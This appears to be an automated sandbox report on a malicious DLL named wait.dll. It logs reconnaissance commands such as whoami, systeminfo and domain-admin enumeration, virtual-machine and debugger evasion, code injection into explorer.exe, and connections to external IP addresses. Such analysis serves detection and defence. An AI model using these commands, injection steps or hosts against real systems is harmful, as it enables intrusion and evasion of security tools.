Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: version.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: authz.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: netutils.dll

Source: C:\Windows\System32\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source: C:\Windows\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office

Jump to behavior

Source: wait.dll.dll

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: wait.dll.dll

Static PE information: Image base 0x180000000 > 0x60000000

Source: wait.dll.dll

Static file information: File size 2151936 > 1048576

Source: wait.dll.dll

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x12fe00

Source: wait.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: wait.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: wait.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: wait.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: wait.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: wait.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: wait.dll.dll

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF

Source: wait.dll.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Source: wait.dll.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: wait.dll.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: wait.dll.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: wait.dll.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: wait.dll.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Contains functionality to dynamically determine API calls

Source: C:\Windows\explorer.exe

Code function: 8_2_0E4589E4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

8_2_0E4589E4

PE file contains an invalid checksum

Source: wait.dll.dll

Static PE information: real checksum: 0x1d7e57 should be: 0x216e55

PE file contains sections with non-standard names

Source: wait.dll.dll

Static PE information: section name: .didat

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\rundll32.exe	Code function: 3_3_000001CEAFDF0105 push ecx; retf	3_3_000001CEAFDF010E
Source: C:\Windows\System32\rundll32.exe	Code function: 4_3_0000027619780105 push ecx; retf	4_3_000002761978010E
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_000002339FC40105 push ecx; retf	6_3_000002339FC4010E

Persistence and Installation Behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\ipconfig.exe ipconfig /all

Boot Survival

Uses net.exe to modify the status of services

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\net.exe net config workstation

Uses whoami command line tool to query computer and username

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami /groups
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami /groups

Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\whoami.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\whoami.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\explorer.exe

Code function: 8_2_0E4576DC rdtsc

8_2_0E4576DC

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\explorer.exe

Code function: 8_2_0E454948 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle,

8_2_0E454948

Contains functionality to query network adapater information

Source: C:\Windows\System32\rundll32.exe	Code function: GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,	3_2_000001CEAFC94D00
Source: C:\Windows\System32\rundll32.exe	Code function: GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,	4_2_0000027619644D00
Source: C:\Windows\System32\rundll32.exe	Code function: GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,	6_2_000002339FBA4D00
Source: C:\Windows\explorer.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,	8_2_03038424
Source: C:\Windows\explorer.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,	8_2_03037274
Source: C:\Windows\explorer.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,	8_2_08387274
Source: C:\Windows\explorer.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,	8_2_08388424
Source: C:\Windows\explorer.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,	8_2_08857274
Source: C:\Windows\explorer.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,	8_2_08858424

Contains functionality to read device registry values (via SetupAPI)

Source: C:\Windows\System32\rundll32.exe

3_2_00007FF8A8CFDCBC

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 2241	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 526	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 6837	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 879	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 876	Jump to behavior

Found evasive API chain checking for process token information

Source: C:\Windows\System32\rundll32.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Windows\System32\rundll32.exe

API coverage: 3.7 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\loaddll64.exe TID: 5856	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6448	Thread sleep count: 2241 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6448	Thread sleep time: -2241000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1276	Thread sleep count: 526 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1276	Thread sleep time: -52600s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6448	Thread sleep count: 6837 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6448	Thread sleep time: -6837000s >= -30000s	Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Queries the current domain controller via net

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D72E90 swprintf,swprintf,FindFirstFileW,GetLastError,swprintf,FindNextFileW,CompareFileTime,FindNextFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,swprintf,swprintf,FindClose,	3_2_00007FF8A8D72E90
Source: C:\Windows\explorer.exe	Code function: 8_2_0303A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,	8_2_0303A8E0
Source: C:\Windows\explorer.exe	Code function: 8_2_03032B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	8_2_03032B28
Source: C:\Windows\explorer.exe	Code function: 8_2_030404C0 FindFirstFileW,	8_2_030404C0
Source: C:\Windows\explorer.exe	Code function: 8_2_0838A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,	8_2_0838A8E0
Source: C:\Windows\explorer.exe	Code function: 8_2_083904C0 FindFirstFileW,	8_2_083904C0
Source: C:\Windows\explorer.exe	Code function: 8_2_08382B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	8_2_08382B28
Source: C:\Windows\explorer.exe	Code function: 8_2_0885A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,	8_2_0885A8E0
Source: C:\Windows\explorer.exe	Code function: 8_2_088604C0 FindFirstFileW,	8_2_088604C0
Source: C:\Windows\explorer.exe	Code function: 8_2_08852B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	8_2_08852B28
Source: C:\Windows\explorer.exe	Code function: 8_2_0E456604 lstrcpyA,lstrlenA,lstrcatA,lstrcatA,FindFirstFileA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,StrStrIA,lstrcpyA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	8_2_0E456604
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4516F4 FindFirstFileW,FindNextFileW,LoadLibraryW,	8_2_0E4516F4
Source: C:\Windows\explorer.exe	Code function: 8_2_0E515C40 FindFirstFileW,FindClose,	8_2_0E515C40
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4F50D8 FindFirstFileA,	8_2_0E4F50D8
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4F5088 CloseHandle,GetCurrentProcessId,FindFirstFileA,FindClose,GetFileSize,	8_2_0E4F5088

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00007FF8A8CF9A80 GetSystemInfo,

3_2_00007FF8A8CF9A80

Source: C:\Windows\System32\loaddll64.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: explorer.exe, 00000008.00000000.2321862445.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: explorer.exe, 00000008.00000003.3094423766.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 00000008.00000003.3856101577.0000000009C93000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000003.3094423766.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: explorer.exe, 00000008.00000003.3857371736.000000000354D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: explorer.exe, 00000008.00000000.2320112731.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE44B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE44B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE44B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617CE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D0E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617D0E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E11E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2511990228.000002339E1B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E1B9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000006.00000003.2511990228.000002339E1B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E1B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWf
Source: rundll32.exe, 00000004.00000002.4536038404.0000027617C68000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: explorer.exe, 00000008.00000003.3220487882.0000000008920000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: explorer.exe, 00000008.00000003.3094423766.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000008.00000003.3094423766.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000008.00000003.3094423766.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTcaVMWare
Source: explorer.exe, 00000008.00000003.3856101577.0000000009C93000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000008.00000003.3102516031.000000000C8DC000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:o_
Source: explorer.exe, 00000008.00000003.3857371736.000000000354D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000008.00000000.2321862445.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: explorer.exe, 00000008.00000003.3857371736.000000000354D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000008.00000003.3857371736.000000000354D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware,p
Source: explorer.exe, 00000008.00000003.3094423766.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000008.00000000.2320112731.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000008.00000003.3094423766.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000000.2321862445.000000000769A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\explorer.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\explorer.exe

Code function: 8_2_0E4576DC rdtsc

8_2_0E4576DC

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_000001CEAFC7CCE0 LdrGetProcedureAddress,

3_2_000001CEAFC7CCE0

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00007FF8A8DB8990 GetLastError,IsDebuggerPresent,OutputDebugStringW,

3_2_00007FF8A8DB8990

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00007FF8A8DB8990 GetLastError,IsDebuggerPresent,OutputDebugStringW,

3_2_00007FF8A8DB8990

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\explorer.exe

Code function: 8_2_0E454948 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle,

8_2_0E454948

Contains functionality to dynamically determine API calls

Source: C:\Windows\explorer.exe

Code function: 8_2_0E4589E4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

8_2_0E4589E4

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00007FF8A8D68920 swprintf,OpenMutexW,swprintf,GetProcessHeap,HeapFree,

3_2_00007FF8A8D68920

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8DCCFD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00007FF8A8DCCFD8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D96264 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00007FF8A8D96264
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4E1DA0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_0E4E1DA0
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4F53A8 SetUnhandledExceptionFilter,	8_2_0E4F53A8

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 104.21.68.89 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.67.217.190 443	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 103.57.249.207 6542	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 94.232.43.224 6542	Jump to behavior

Allocates memory in foreign processes

Source: C:\Windows\System32\rundll32.exe	Memory allocated: C:\Windows\explorer.exe base: 3030000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Memory allocated: C:\Windows\explorer.exe base: 8380000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Memory allocated: C:\Windows\explorer.exe base: 8850000 protect: page execute and read and write	Jump to behavior

Contains functionality to inject threads in other processes

Source: C:\Windows\System32\rundll32.exe	Code function: 3_3_00007DF4A9FC0100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,	3_3_00007DF4A9FC0100
Source: C:\Windows\System32\rundll32.exe	Code function: 4_3_00007DF4051C0100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,	4_3_00007DF4051C0100
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_00007DF445320100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,	6_3_00007DF445320100

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\rundll32.exe	Thread created: C:\Windows\explorer.exe EIP: 3030000	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread created: C:\Windows\explorer.exe EIP: 8380000	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread created: C:\Windows\explorer.exe EIP: 8850000	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\System32\rundll32.exe	Memory written: C:\Windows\explorer.exe base: 3030000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Memory written: C:\Windows\explorer.exe base: 8380000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Memory written: C:\Windows\explorer.exe base: 8850000 value starts with: 4D5A	Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\rundll32.exe	Memory written: PID: 1028 base: 3030000 value: 4D	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Memory written: PID: 1028 base: 8380000 value: 4D	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Memory written: PID: 1028 base: 8850000 value: 4D	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 412	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 412	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 412	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 412	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 412	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 4084	Jump to behavior
